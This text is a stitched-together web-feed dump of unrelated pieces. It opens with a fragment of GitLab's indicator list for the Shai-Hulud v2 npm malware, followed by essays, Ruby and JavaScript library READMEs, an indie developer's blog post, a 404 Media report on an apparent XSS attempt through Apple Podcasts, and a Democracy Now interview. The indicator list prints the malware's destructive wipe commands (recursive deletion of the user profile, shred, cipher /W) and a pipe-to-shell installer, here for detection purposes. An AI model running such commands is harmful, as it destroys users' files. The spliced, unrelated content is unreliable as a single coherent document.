Malicious post-install script in node_modules directories
directory
.truffler-cache/
Hidden directory created in user home for Trufflehog binary storage
directory
.truffler-cache/extract/
Temporary directory used for binary extraction
file
.truffler-cache/trufflehog
Downloaded Trufflehog binary (Linux/Mac)
file
.truffler-cache/trufflehog.exe
Downloaded Trufflehog binary (Windows)
process
del /F /Q /S "%USERPROFILE%*"
Windows destructive payload command
process
shred -uvz -n 1
Linux/Mac destructive payload command
process
cipher /W:%USERPROFILE%
Windows secure deletion command in payload
command
curl -fsSL https://bun.sh/install | bash
Suspicious Bun installation during NPM package install
command
powershell -c "irm bun.sh/install.ps1|iex"
Windows Bun installation via PowerShell
How GitLab can help you detect this malware campaign
If you are using GitLab Ultimate, you can leverage built-in security capabilities to immediately surface exposure tied to this attack within your projects.
First, enable
Dependency Scanning
to automatically analyze your project's dependencies against known vulnerability databases.
If infected packages are present in your
package-lock.json
or
yarn.lock
files, Dependency Scanning will flag them in your pipeline results and the Vulnerability Report.
For complete setup instructions, refer to the
Dependency Scanning documentation
.
Once enabled, merge requests introducing a compromised package will surface a warning before the code reaches your main branch.
Next,
GitLab Duo Chat
can be used with Dependency Scanning to provide a fast way to check your project's exposure without navigating through reports. From the dropdown, select the
Security Analyst Agent
and simply ask questions like:
"Are any of my dependencies affected by the Shai-Hulud v2 malware campaign?"
"Does this project have any npm supply chain vulnerabilities?"
"Does this project have any npm supply chain vulnerabilities?"
"Show me critical vulnerabilities in my JavaScript dependencies."
The agent will query your project's vulnerability data and provide a direct answer, helping security teams triage quickly across multiple projects.
For teams managing many repositories, we recommend combining these approaches: use Dependency Scanning for continuous automated detection in CI/CD, and the Security Analyst Agent for ad-hoc investigation and rapid response during active incidents like this one.
Looking ahead
This campaign represents an evolution in supply chain attacks where the threat of collateral damage becomes the primary defense mechanism for the attacker's infrastructure. The investigation is ongoing as we work with the community to understand the full scope and develop safe remediation strategies.
GitLab's automated detection systems continue to monitor for new infections and variations of this attack. By sharing our findings early, we hope to help the community respond effectively while avoiding the pitfalls created by the malware's dead man's switch design.
The Dark Side of Gratitude: When Thankfulness Becomes a Tool of Control
Portside
portside.org
2025-11-27 15:16:38
The Dark Side of Gratitude: When Thankfulness Becomes a Tool of Control
Kurt Stand
Thu, 11/27/2025 - 10:16
...
We live in a world that constantly tells us to “count our blessings.” Gratitude is praised as a moral virtue, a mental tonic, a gateway to happiness. Entire industries are built on it: journals, apps, workshops, and
social media
trends. But what if gratitude isn’t a virtue at all? What if, instead of elevating us, it functions as a quiet mechanism that traps, silences, and pacifies us?
At first glance, gratitude seems harmless—even virtuous. A simple “thank you” can smooth social interactions, remind us of the positive, and cultivate humility. Yet much of our gratitude is coerced, performative, or socially demanded. We are expected to be thankful, whether or not we genuinely feel it. Miss the cue, fail to smile, or silently resent the “blessing” offered, and we are framed as ungrateful, even morally deficient. Gratitude often functions less as a choice and more as a social leash, compelling people to perform virtue on cue.
Take the workplace, for example. Employees are often reminded to “be grateful for having a job” when faced with low pay, long hours, or toxic conditions. The intention may be to inspire appreciation, but the ultimate effect is control—gratitude becomes a tool for compliance. By teaching people to “be grateful” for injustice or minimal provision, society trains obedience under the guise of virtue. It pacifies dissatisfaction by framing fundamental rights and fair treatment as privileges rather than entitlements. In such cases, thankfulness isn’t just a moral exercise—it’s a mechanism to normalize inequity.
Gratitude can act as emotional camouflage. We are taught to appreciate our lives, our health, our families, sometimes even our misfortunes. Perspective is valuable, but the relentless pressure to be thankful can suppress genuine emotions. Anger, grief, frustration—signals that something is wrong—are nudged aside. We are told to “look on the bright side,” even when the side that demands closer scrutiny is dark. Gratitude, in this sense, becomes a velvet handcuff: soft, polite, yet restraining real feelings and masking problems we need to confront. The human psyche thrives on complexity, but “gratitude culture” encourages simplification: Everything must be filtered through a lens of thankfulness.
The braver, wiser act is to stop counting blessings on command, to resist the soft tyranny of enforced gratitude, and to reclaim our right to anger, dissatisfaction, and honesty.
Gratitude also carries a heavy psychological burden. Feeling obligated to reciprocate kindness or opportunity breeds stress and anxiety. Recognizing genuine generosity is one thing; living under a constant sense of debt—to friends, family, employers, or society—is another. Those with fewer resources bear this pressure more heavily: Expectations of gratitude are imposed when there is little power to refuse or negotiate social norms. For some, gratitude becomes an unspoken
debt
that never expires, a pressure cooker of stress and resentment. In these cases, it is not liberating, but a subtle form of coercion.
We are also encouraged to turn gratitude inward as a self-help tool: “Practice daily gratitude, and you will be happier.” While brief reflections on what we value can improve mood, this framing risks individualizing systemic problems. Feeling unhappy? Focus on what you do have. Struggling with debt, illness, or social injustice? Count your blessings. Gratitude thus becomes a psychological Band-Aid, a quiet insistence that the problem lies not in circumstances or structures but in our own perception. It is both a pacifier and a distraction from meaningful action.
It’s worth noting that gratitude, in its purest, voluntary form, is not inherently bad. Genuine, spontaneous thankfulness can deepen relationships, foster empathy, and anchor us in meaningful moments. The problem arises when gratitude is demanded, packaged, or weaponized—when it is less a personal reflection and more a social or institutional expectation. That is when it stops being a virtue and becomes a subtle tool of emotional and psychological manipulation.
Consider the social
media
dimension. We post “thankful” photos, recount the blessings of our lives, and share curated moments of appreciation. These public expressions rarely arise from raw emotion—they are curated for approval, likes, and social validation. Such displays may appear harmless, even charming, but they reinforce the notion that gratitude is an obligation rather than an
organic
experience.
Even in intimate settings, gratitude can carry hidden pressures. Being thankful to a loved one can generate unspoken debts or expectations: a favor must be repaid, a kindness acknowledged, a gesture reciprocated. This is not always harmful, but it becomes so when gratitude is demanded or used as leverage. In this sense, gratitude is not purely virtuous; it is a social contract with emotional consequences.
Step back, and a pattern emerges: Gratitude is often less about authentic appreciation and more about maintaining social harmony, suppressing discontent, and normalizing
inequality
. It is a quietly coercive force. And yet, we are rarely taught to question it. We are trained to assume that gratitude is inherently virtuous, morally neutral, or personally beneficial. What if, instead, we allowed ourselves to interrogate it—to ask whether our thankfulness is truly ours or imposed?
The real question is not whether gratitude can be good. It can. The question is whether our culture has overvalued it, weaponized it, or confused performative thankfulness with genuine reflection. By unquestioningly embracing gratitude as a moral imperative, we risk ignoring discomfort, overlooking injustice, and silencing authentic emotion. Sometimes, the bravest act is not to be thankful—to allow ourselves anger, frustration, or dissatisfaction. Sometimes the healthiest choice is to withhold thanks, at least until we genuinely feel it.
In rethinking gratitude, we are not rejecting kindness or appreciation. We are reclaiming the right to feel emotions honestly, without guilt or coercion. We are resisting the subtle pressures that tell us to be grateful for situations that do not deserve it. Authentic gratitude, like all virtues, cannot be commanded; it must emerge voluntarily, thoughtfully, and without obligation. Only then can it be meaningful.
The braver, wiser act is to stop counting blessings on command, to resist the soft tyranny of enforced gratitude, and to reclaim our right to anger, dissatisfaction, and honesty. Gratitude should serve us—not the agendas of others.
Martina Moneke writes about art, fashion, culture, and politics. In 2022, she received the Los Angeles Press Club’s First Place Award for Election Editorials at the 65th Annual Southern California Journalism Awards. She is based in Los Angeles and New York.
Common Dreams is a reader-supported independent news outlet created in 1997 as a new media model. Our nonprofit newsroom covers the most important news stories of the moment. Common Dreams free online journalism keeps our millions of readers well-informed, inspired, and engaged.
LowType introduces the concept of "type expressions" in method arguments. When an argument's default value resolves to a type instead of a value then it's treated as a type expression. Now you can have types in Ruby in the simplest syntax possible:
classMyClassincludeLowTypedefsay_hello(greeting:String)# Raises exception at runtime if greeting is not a String.endend
Default values
Place
|
after the type definition to provide a default value when the argument is
nil
:
If you need a multi-line return type/value then I'll even let you put the
-> { T }
on multiple lines, okay? I won't judge. You are a unique flower
🌸
with your own style, your own needs. You have purpose in this world and though you may never find it, your loved ones will cherish knowing you and wish you were never gone:
defsay_farewell_with_a_long_method_name(farewell:String)->{::Long::Name::Space::CustomClassOne|::Long::Name::Space::CustomClassTwo|::Long::Name::Space::CustomClassThree}# Code that returns an instance of one of the above types.end
Instance variables
To define typed
@instance
variables use the
type_[reader, writer, accessor]
methods.
These replicate
attr_[reader, writer, accessor]
methods but also allow you to define and check types.
Type Reader
type_readername:String# Creates a public method called `name` that gets the value of @namename# Get the value with type checkingtype_readername:String|'Cher'# Gets the value of @name with a default value if it's `nil`name# Get the value with type checking and return 'Cher' if the value is `nil`
Type Writer
type_writername:String# Creates a public method called `name=(arg)` that sets the value of @namename='Tim'# Set the value with type checking
Type Accessor
type_accessorname:String# Creates public methods to get or set the value of @namename# Get the value with type checkingname='Tim'# Set the value with type checkingtype_accessorname:String|'Cher'# Get/set the value of @name with a default value if it's `nil`name# Get the value with type checking and return 'Cher' if the value is `nil`name='Tim'# Set the value with type checking
ℹ️
Multiple Arguments
You can define multiple typed accessor methods just like you would with
attr_[reader, writer, accessor]
:
type_accessorname:String|nil,occupation:'Doctor',age:Integer|33name# => niloccupation# => Doctor (not type checked)age='old'# => Raises ArgumentTypeErrorage# => 33
Local variables
type()
alias:
low_type()
To define typed
local
variables at runtime use the
type()
method:
my_var=typeMyType|fetch_my_object(id:123)
my_var
is now type checked to be of type
MyType
when assigned to.
Don't forget that these are just Ruby expressions and you can do more conditional logic as long as the last expression evaluates to a value:
my_var=typeString|(say_goodbye||'Hello Again')
ℹ️
Enumerables
To use the
Array[]
/
Hash[]
enumerable syntax with
type()
you must add
using LowType::Syntax
when including LowType:
includeLowTypeusingLowType::Syntax
Syntax
[T]
Enumerables
Array[T]
and
Hash[T]
class methods represent enumerables in the context of type expressions. If you need to create a new
Array
/
Hash
then use
Array.new()
/
Hash.new()
or Array and Hash literals
[]
and
{}
. This is the same syntax that
RBS
uses and we need to get use to these class methods returning type expressions if we're ever going to have inline types in Ruby.
RuboCop
also suggests
{}
over
Hash[]
syntax for creating hashes.
|
Union Types / Default Value
The pipe symbol (
|
) is used in the context of type expressions to define multiple types as well as provide the default value:
To allow multiple types separate them between pipes:
my_var = TypeOne | TypeTwo
The last
value
/
nil
defined becomes the default value:
my_var = TypeOne | TypeTwo | nil
If no default value is defined then the argument will be required.
-> { T }
Return Type
The
-> { T }
syntax is a lambda without an assignment to a local variable. This is valid Ruby that can be placed immediately after a method definition and on the same line as the method definition, to visually look like the output of that method. It's inert and doesn't run when the method is called, similar to how default values are never called if the argument is managed by LowType. Pretty cool stuff yeah? Your type expressions won't keep re-evaluating in the wild
🐴
, only on class load.
ℹ️
Note:
A method that takes no arguments must include empty parameters
()
for the
-> { T }
syntax to be valid;
def method() -> { T }
.
value(T)
Value Expression
alias:
low_value()
To treat a type as if it were a value, pass it through
value()
first:
defmy_method(my_arg:String|MyType|value(MyType))# => MyType is the default value
Performance
LowType evaluates type expressions on
class load
(just once) to be efficient and thread-safe. Then the defined types are checked per method call.
However,
type()
type expressions are evaluated when they are called at
runtime
on an instance, and this may impact performance.
Evaluation
Validation
ℹ️
Example
Method param types
🟢
Class load
🟠
Runtime
def method(name: T)
Method return types
🟢
Class load
🟠
Runtime
def method() -> { T }
Instance types
🟢
Class load
🟠
Runtime
type_accessor(name: T)
Local types
🟠
Runtime
🟠
Runtime
type(T)
Architecture
LowType only affects the class that it's
include
d into. Class methods
Array[]
/
Hash[]
are modified for the type expression enumerable syntax (
[]
) to work, but only for LowType's internals (using refinements) and not the
include
d class. The
type()
method requires
using LowType::Syntax
if you want to use the enumerable syntax but will still only affect the
Array[]
/
Hash[]
class methods of the
include
d class.
Config
Copy and paste the following and change the defaults to configure LowType:
LowType.configuredo|config|# Set to :log or :none to disable the raising of an exception when types are invalid. [UNRELEASED]config.error_mode=:error# Set to :value to show a concatenated inspect of the invalid param when an error is raised. Or :none to redact.# Great for debugging, bad for security, and makes tests harder to write when the error messages are so dynamic.config.output_mode=:typeconfig.output_size=100# Set to true to type check all elements of an Array/Hash (not just the first)config.deep_type_check=false# The "|" pipe syntax requires a monkey-patch but can be disabled if you don't need union types with default values.# This is the only monkey-patch in the entire library and is a relatively harmless one, see "syntax/union_types.rb".# Set to false and typed params will always be required, as there's no "| nil" syntax (remove type to make optional)config.union_type_expressions=trueend
Types
Basic types
String
Integer
Float
Array
Hash
nil
represents an optional value
ℹ️
Any class/type that's available to Ruby is available to LowType, you just might need to
require
it.
Complex types
Boolean
(accepts
true
/
false
) [UNRELEASED]
Tuple
(subclass of
Array
)
Status
(subclass of
Integer
) - TODO: Check integer to be a valid HTTP status code
Headers
(subclass of
Hash
)
HTML
(subclass of
String
) - TODO: Check that string is HTML
JSON
(subclass of
String
) - TODO: Check that string is JSON
XML
(subclass of
String
) - TODO: Check that string is XML
Integrations
Because LowType is low-level it should work with method definitions in any framework out of the box. With that in mind we go a little further here at free-software-by-shadowy-figure-co to give you that extra framework-specific-special-feeling:
Sinatra
include LowType
in your modular
Sinatra::Base
subclass to get Sinatra specific return types.
LowType will automatically add the necessary
content_type
[UNRELEASED] and type check the return value:
require'sinatra/base'require'low_type'classMyApp<Sinatra::BaseincludeLowType# A simple string response type.get'/'do->{String}'body'end# Standard types Sinatra uses.get'/'do->{Array[Integer,Hash,String]}[200,{},'<h1>Hello!</h1>']end# Types specifically for Sinatra.get'/'do->{Tuple[Status,Headers,HTML]}[200,{},'<h1>Hello!</h1>']endend
Rubocop
Because we're living in the future, Rubocop isn't ready for us. Put the following in your
.rubocop.yml
:
# Support LowType return value "-> { T }" syntax.Style/TrailingBodyOnMethodDefinition:Enabled:falseLayout/IndentationConsistency:Enabled:falseLayout/MultilineBlockLayout:Enabled:falseStyle/DefWithParentheses:Enabled:falseLint/Void:Enabled:false# Support Array[]/Hash[] syntax.Style/RedundantArrayConstructor:Enabled:false
Installation
Add
gem 'low_type'
to your Gemfile then:
bundle install
Philosophy
🦆
Duck typing is beautiful.
Ruby is an amazing language
BECAUSE
it's not typed. I don't believe Ruby should ever be fully typed, but you should be able to sprinkle in types into some areas of your codebase where you'd like self-documentation and a little reassurance that the right values are coming in/out.
🌀
Less DSL. More types.
As much as possible LowType looks just like Ruby if it had types. There's no special method calls for the base functionality, and defining types at runtime simply uses a
type()
method which almost looks like a
type
keyword, had Ruby implemented types.
🤖
AI makes you dumb.
AI is theoretically a cool concept but in practice capitalism just uses it to steal wealth.
Social media has become a reminder of something precious we are losing in the age of LLMs:
unique voices
.
Over time, it has become obvious just how many posts are being generated by an LLM. The tell is the voice. Every post sounds like it was posted by the same social media manager.
If you rely on an LLM to write all your posts, you are making a mistake.
Your voice is an asset. Not just what you want to say, but how you say it.
Your voice is unique. It is formed from your lifetime of lived experiences. No one's voice will be exactly like yours.
Your voice becomes recognizable. Over many posts it becomes something people subconsciously connect with, recognize, trust, and look forward to.
Your voice provides the framework for the impression you leave in a job interview, while networking at a meet-up, or with a co-worker.
Years ago I got a job thanks to my blog posts. A manager wanted my voice influencing their organization. Your voice is an asset.
Your voice matures and becomes even more unique with time and practice.
LLMs can rob you of that voice, and the rest of us lose something precious in the process.
Having an LLM write "in your voice" is not the same. Your voice is not static. It changes with the tides of your life and state of mind. Your most impactful message may come because it was the right moment and you were in the right frame of mind.
Let your voice grow with use. Let it be unique.
Do not let one of your greatest assets fade into atrophy, wilted by cognitive laziness.
Write in
your
voice.
I do not care what the linguistic remix machine juggles into being.
I care what you have to say.
Don't be a scary old guy: My 40s survival strategy with charm
Hi, it’s
Takuya
.
Last week I had my birthday and turned 41 (November 19th).
When I was younger, I could never really picture what life in my 40s would look like. It’s this vague age where you don’t have a clear image of how you’re supposed to live, right? Even if I try to look back at my dad at this age, he was always at work during the day, so he’s not much of a reference.
I make a living as an indie developer
, and thanks to what I built up through my 20s and 30s, I can live the way I do now. Compared to a typical Japanese salaryman, I can join childcare much more flexibly, and I get to spend a lot of time with my kid. I’ve even made some “mom friends (mama-tomo)” at kindergarten.
In this post, I'd like to share my survival strategy for the 40s. As the title says, the conclusion is:
“charm”
— being warm and approachable.
Let me explain why I think this kind of charm matters so much for middle-aged men.
TL;DR
“You’ve got presence” just means “You look older now.”
Make a smile. A grumpy middle-aged guy is just scary
Be humble. The more achievements you stack, the more people shrink back
Use the charm of contrast
“You’ve got presence” just means “You look older now.”
For students, guys in their 40s are full-on old dudes. At least that’s how I saw them. It’s basically the age of school teachers.
When I hit my late 30s, people around me started to say things like:
“You’ve got
kanroku
now.”
In Japanese,
kanroku
means something like “gravitas” or “presence.”
And no, they didn’t mean my belly was growing.
At first, I secretly thought:
“Finally, my life experience is starting to radiate as an aura!”
…but over time I realized that wasn’t it at all. It simply meant: I got older.
In other words, “You’ve aged,” “You look older now,” wrapped in the most positive wording possible.
I mean, think about it. What even is “aura,” really? lol
If I’ve really built up so much life experience, why am I still getting scolded by kindergarten teachers for being late to the bus pick-up? It doesn’t feel like I’m walking around radiating some wise, dignified aura.
Make a smile. A grumpy middle-aged guy is just scary
Having gravitas doesn’t actually help you that much. If a middle-aged guy is frowning, shoulders slumped, walking around with a dark cloud over him, you just want to keep your distance, right?
If you wrap yourself in charm instead, you can cancel out like half of that rough “old guy presence.”
I used to work part-time at a café. When I asked the manager why he decided to hire me, he said:
“Because your smile was good.”
On YouTube as well, I try to make a smile in my videos. A smile is a key ingredient of charm.
To cancel out this heavy “presence,” I want to be even more intentional about smiling and staying approachable in my daily life.
Be humble. The more achievements you stack, the more people shrink back
If you just keep doing something for a long time, your achievements naturally pile up. And if you’re lucky, some of them end up being work that lots of people praise you for.
But then one day you realize: The friends who used to argue with you freely and push back hard are suddenly keeping their distance.
Indie dev is already lonely enough. But the more “achievements” you stack, the more your potential conversation partners quietly disappear.
I read somewhere that Hirohiko Araki, the manga artist behind
JoJo’s Bizarre Adventure
, once said that he’s become so successful and revered that people are now scared of him, and no one gives him advice anymore.
It makes sense. If you imagine giving feedback to a famous author or legendary director, it feels terrifying, right?
That’s why Araki-sensei apparently gets really happy when someone ignores that aura, doesn’t shrink back, and just casually says what they think.
From what I’ve seen of him on TV and such, he seems full of charm. He smiles, teaches kids, and comes across as very gentle and kind. He’s a great example. If even someone like him still gets put on a pedestal and loses people to bounce ideas off, I absolutely have no business acting all high and mighty.
Use the charm of contrast
The more serious and stern someone looks, the more powerful their smile becomes. That contrast is what makes it hit. In Japanese, we even have a word for this:
gap moe
(ギャップ萌え) — the charm that comes from an unexpected contrast in someone’s personality or appearance.
Take guitarist Eddie Van Halen, for example:
When I picture an amazing guitarist, I tend to imagine someone completely lost in their own world, making intense faces while they play.
But Eddie often turns to the crowd and smiles, clearly trying to entertain and enjoy it
with
them. That attitude is incredibly likeable.
Programmers are a good example of a job that’s hard for people to picture. When mom friends ask what I do and I say:
“I’m a programmer.”
I often get:
“Ah, I don’t really know much about computers…”
It’s not that they’re rejecting it; they just can’t imagine what I actually do, so they don’t know how to respond. The fewer shared reference points you have with someone, the more important it is to approach them with a soft, relaxed attitude. You don’t have to explain everything in detail. If they can at least feel that “he seems to enjoy his work and looks like he’s having fun,” that’s more than enough.
So that’s what I want to value in my 40s.
Lately, I’ve been feeling like younger people show me more respect than before. Precisely because of that, this is the time to
not
act superior, but instead live humbly and gently. I want to keep learning from younger generations and be inspired by them. I want to stay in touch with new values and cultures all the time. To do that, I have to break through the “gravitas” barrier myself. And I think charm is essential for that.
If you’re around my age, what do
you
want to value in your life?
I’d love to hear.
Here’s to good 40s for all of us!
Thanks for reading. Inkdrop is a Markdown-focused note-taking app for developers. It’s not about having tons of features — its strengths are the clean design and simplicity. If you’re looking for a clean and simple notes app, check it out:
SyncKit is a
production-ready sync engine
that makes building local-first applications trivial.
"Add
sync.document()
to your app, get real-time sync automatically."
The problem:
Building sync from scratch takes months. Existing solutions are complex (Yjs), expensive (Firebase), or don't work offline (Supabase).
The solution:
SyncKit gives you production-ready sync in 3 lines of code.
constsync=newSyncKit()awaitsync.init()constdoc=sync.document<Todo>('todo-123')awaitdoc.update({completed: true})// ✨ Works offline, syncs automatically, resolves conflicts
🎬 See It In Action
Real-time collaboration with offline resilience:
Watch tasks sync instantly across tabs—even while offline. The example app demonstrates SyncKit's offline-first capabilities combined with smart browser storage to create a seamless collaborative experience.
✨ Why SyncKit?
🚀
Works When Internet Doesn't
True offline-first architecture—not just caching. Your app works perfectly on planes, trains, tunnels, and coffee shops with spotty WiFi.
import{SyncKit}from'@synckit-js/sdk'import{SyncProvider,useSyncDocument}from'@synckit-js/sdk/react'// Initialize (works offline-only, no server needed!)constsync=newSyncKit()awaitsync.init()functionApp(){return(<SyncProvidersynckit={sync}><TodoApp/></SyncProvider>)}functionTodoApp(){const[todo,{ update }]=useSyncDocument<Todo>('todo-1')if(!todo||!todo.text)return<div>Loading...</div>return(<div><inputtype="checkbox"checked={todo.completed}onChange={(e)=>update({completed: e.target.checked})}/><span>{todo.text}</span></div>)}
graph TD
A[Your Application<br/>React/Vue/Svelte] --> B[SyncKit SDK<br/>TypeScript]
B -->|Simple API| B1[document, text, counter]
B -->|Framework adapters| B2[React/Vue/Svelte hooks]
B -->|Offline queue| B3[Storage adapters]
B --> C[Rust Core Engine<br/>WASM + Native]
C -->|80% of use cases| C1[LWW Sync]
C -->|Collaborative editing| C2[Text CRDTs]
C -->|Advanced features| C3[Custom CRDTs<br/>counters, sets]
C --> D[IndexedDB Storage<br/>Your local source of truth]
D -.->|Optional| E[SyncKit Server<br/>TypeScript/Python/Go/Rust]
E -->|Real-time sync| E1[WebSocket]
E -->|Persistence| E2[PostgreSQL/MongoDB]
E -->|Security| E3[JWT auth + RBAC]
style A fill:#e1f5ff,stroke:#333,stroke-width:2px,color:#1a1a1a
style B fill:#fff4e1,stroke:#333,stroke-width:2px,color:#1a1a1a
style C fill:#ffe1e1,stroke:#333,stroke-width:2px,color:#1a1a1a
style D fill:#e1ffe1,stroke:#333,stroke-width:2px,color:#1a1a1a
style E fill:#f0e1ff,stroke:#333,stroke-width:2px,color:#1a1a1a
// Note: Text CRDT API is planned for v0.2.0consttext=sync.text('document-456')awaittext.insert(0,'Hello ')text.subscribe(content=>editor.setValue(content))// Character-level sync, conflict-free convergence
// Note: Counter API is planned for v0.2.0constcounter=sync.counter('likes-789')awaitcounter.increment()// Conflict-free counter (additions never conflict)
In addition to the following, see the
tests folder
for more example
.prompt
files.
Basic prompt with stdin
---model: anthropic/claude-sonnet-4-20250514---
Summarize this text: {{STDIN}}
cat article.txt | ./runprompt summarize.prompt
The special
{{STDIN}}
variable always contains the raw stdin as a string.
Structured JSON output
Extract structured data using an output schema:
---model: anthropic/claude-sonnet-4-20250514input:schema:text: stringoutput:format: jsonschema:name?: string, the person's nameage?: number, the person's ageoccupation?: string, the person's job---
Extract info from: {{text}}
echo"John is a 30 year old teacher"| ./runprompt extract.prompt
# {"name": "John", "age": 30, "occupation": "teacher"}
Fields ending with
?
are optional. The format is
field: type, description
.
Chaining prompts
Pipe structured output between prompts:
echo"John is 30"| ./runprompt extract.prompt | ./runprompt generate-bio.prompt
The JSON output from the first prompt becomes template variables in the second.
CLI overrides
Override any frontmatter value from the command line:
Someone Is Trying to ‘Hack’ People Through Apple Podcasts
403 Media
www.404media.co
2025-11-27 14:00:21
For months Apple Podcasts has been randomly opening spirituality and religion podcasts by itself, and one case directing listeners to a potentially malicious website....
Something very strange is happening to the Apple Podcasts app. Over the last several months, I’ve found both the iOS and Mac versions of the Podcasts app will open religion, spirituality, and education podcasts with no apparent rhyme or reason. Sometimes, I unlock my machine and the podcast app has launched itself and presented one of the bizarre podcasts to me. On top of that, at least one of the podcast pages in the app includes a link to a potentially malicious website. Here are the titles of some of the very odd podcasts I’ve had thrust upon me recently (I’ve trimmed some and defanged some links so you don’t accidentally click one):
“5../XEWE2'""""onclic…”
“free will, free willhttp://www[.]sermonaudio[.]com/rss_search.asp?keyword=free%will on SermonAudio”
There was another with a title in Arabic that loosely translates to “Words of Life” and includes someone’s Gmail address. Sometimes the podcasts do have actual audio (one was a religious sermon); others are completely silent. The podcasts are often years old, but for some reason are being shown to me now.
I’ll be honest: I don’t really know what exactly is going on here. And neither did an expert I spoke to. But it’s clear someone, somewhere, is trying to mess with Apple Podcasts and its users.
“The most concerning behavior is that the app can be launched automatically with a podcast of an attacker’s choosing,” Patrick Wardle, a macOS security expert and the creator of Mac-focused
cybersecurity organization Objective-See
, said. “I have replicated similar behavior, albeit via a website: simply visiting a website is enough to trigger Podcasts to open (and a load a podcast of the attacker’s choosing), and unlike other external app launches on macOS (e.g. Zoom), no prompt or user approval is required.”
💡
Do you know anything else about these weird podcasts? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at joseph@404media.co.
To caveat straight away: this isn’t
that
alarming. This is not the biggest hack or issue in the world. But it’s still very weird behavior and Apple has not responded to any of my requests for comment for months. “Of course, very much worth stressing, on its own this is not an attack,” Wardle continued. “But it does create a very effective delivery mechanism if (and yes, big if) a vulnerability exists in the Podcasts app.
That said, someone has tried to deliver something a bit more malicious through the Podcasts app. It’s the first podcast I mentioned, with the title “5../XEWE2'""""onclic…”. Maybe some readers have already picked up on this, but the podcast is trying to direct listeners to a site that attempts to perform a cross-site scripting, or XSS, attack. XSS is basically when a hacker injects their own
malicious code into a website that otherwise looks legit
. It’s definitely a low-hanging fruit kind of attack, at least today. I remember it being way, way more common 10 years ago, and it was ultimately what led
to the infamous MySpace worm
.
The weird link is included in the “Show Website” section of the podcast’s page. Visiting that redirects to another site, “test[.]ddv[.]in[.]ua.” A pop-up then says “XSS. Domain: test[.]ddv[.]in[.]ua.”
I’m seemingly not the only one who has seen this. A review left in the Podcasts app just a few weeks ago says “Scam. How does Apple allow this attempted XSS attack?” The person gave the podcast one star. That podcast itself dates from around 2019.
“Whether any of those attempts have worked remains unclear, but the level of probing shows that adversaries are actively evaluating the Podcasts app as a potential target,” Wardle said.
Overall, the whole thing gives a similar vibe to Google Calendar spam, where someone will sneakily add an event to your calendar and include whatever info or link they’re trying to spread around. I remember that being a
pretty big issue a few years ago
.
Apple did not acknowledge or respond to five emails requesting comment. The company did respond to other emails for different articles I was working on across that time.
About the author
Joseph is an award-winning investigative journalist focused on generating impact. His work has triggered hundreds of millions of dollars worth of fines, shut down tech companies, and much more.
My Father Is a Warrior & My Hero: An Interview with Leonard Peltier's Daughter Marquetta
Democracy Now!
www.democracynow.org
2025-11-27 13:50:26
Marquetta Shields-Peltier was just a toddler when her father, Leonard Peltier, was jailed in 1976. During our recent trip to Turtle Mountain Reservation in North Dakota, we spoke to Marquetta about the campaign to free her father and what it meant to see him released in February....
This is a rush transcript. Copy may not be in its final form.
AMY
GOODMAN
:
While we were there, I also had a chance to talk to one of Leonard Peltier’s daughters, who was just a toddler when Leonard Peltier was jailed in 1976.
MARQUETTA
SHIELDS
-
PELTIER
:
My name is Marquetta Shields-Peltier. I’m the daughter of Leonard Peltier. I’m 52 years old. And I’m standing outside my dad’s house. After 49 years of imprisonment, my dad is finally free, and I’m home with him.
AMY
GOODMAN
:
So, you live in Lawrence. You have for decades. Lawrence is not that far from Leavenworth, where he was held for many, many years before moving on to Coleman in Florida. What are your earliest memories of your dad?
MARQUETTA
SHIELDS
-
PELTIER
:
My earliest memory of me and my dad was actually in Marion, Illinois, when he was there, before it was supermax. I was there with my grandmother, Hazel, and my little brother, Waha. And I remember sitting beside my grandma, waiting for my dad to come out those doors for the first time ever. And I remember asking my grandma, I said, “Do you think my dad’s gonna like me?” And she’s like, “Yeah, he’s gonna love you.” And I said, “Is it OK if I hug my dad?” You know? And she was like, “Yeah, of course. Go hug him.” And she kind of pushed me in that door, towards the door. And when it opened and he came out, he just smiled, and I ran to him. And I just remember him hugging me, and I was like, “That’s my dad. That’s my dad,” you know, because I hadn’t — I don’t have any memories prior to that. They said we lived together in Oregon, but I don’t remember that. They said we saw him in Canada when he — before they extradited him, but I don’t remember that.
AMY
GOODMAN
:
How old were you when you saw him in Marion?
MARQUETTA
SHIELDS
-
PELTIER
:
I think I was around 7 or 8 years old, yeah.
AMY
GOODMAN
:
So, what was it like through those years? I mean, it’s the only thing you knew, but to visit him only behind bars?
MARQUETTA
SHIELDS
-
PELTIER
:
When I was young, it was really confusing. It was hard to understand why, you know, because he kind of protected me, probably because I was so young and I didn’t understand what was going on. But it was bittersweet, because I loved going there. And, like, for me, that was normal, you know, to see my dad there. Even though there’s dads around me with my other friends and stuff, I just — for me, that was normal.
But as I got older and started to understand what was going on, why he was there, I started to resent it, you know, because every time 3:00 came around, I hated it, because I knew I was going to have to leave my dad, and I wouldn’t see him again, especially that last day of the visit. We would usually spend about a week. And that last day of visits, I would just, like, “Man, I’m not going to see my dad again for six, seven months,” you know? And then, as I got older, it was just like, “Oh my god, what if I don’t get to see him again next time?”
You know, so, eventually I packed up my kids and moved to Kansas so I could be closer to him. And then that worked out for about three years. And then, from there, they moved him again across the country. So, yeah, we didn’t get to have the relationship I thought we would during that time, just because he was way over in Pennsylvania, then Florida, and I was stuck in Kansas.
AMY
GOODMAN
:
And what was your understanding from early on, and did it change, of why he was behind bars?
MARQUETTA
SHIELDS
-
PELTIER
:
Yeah, I just — like, I knew things had happened that were, you know, not — I’ve always been told and taught that my dad was there because he wanted better for me as his daughter, as a Native person. He wanted people to respect me, not only as his daughter, but just as a Native person, you know, to understand that we are not property or we are not animals or savages, that we are human beings, just like everybody else.
And as I got older and started understanding his case and what was, you know, the details of it, then it went from, you know, resenting — I never resented my dad, but I resented the government, and I resented — you know, but it went from not knowing the extent of it to knowing the full extent of it and just being proud of — like, even though I prayed for him to get out all the time, I knew what he stood for, and I was proud. And I had to, you know, keep fighting for him, because I knew that someday, someday, he would get out, you know? And he did. He did, which is unbelievable to me still.
AMY
GOODMAN
:
When did you hear that Biden had commuted his sentence and sentenced him to home confinement?
MARQUETTA
SHIELDS
-
PELTIER
:
I don’t remember the date exactly, but it was sometime at the end of January. It was just crazy, because I was planning on leaving. I was going to leave the country and just disappear, because I — after his parole was denied in June of ’24 — I think it was ’24 — I basically thought my dad was going to die there. So I had given up on everything, and I was getting ready to disappear into Canada and just disappear.
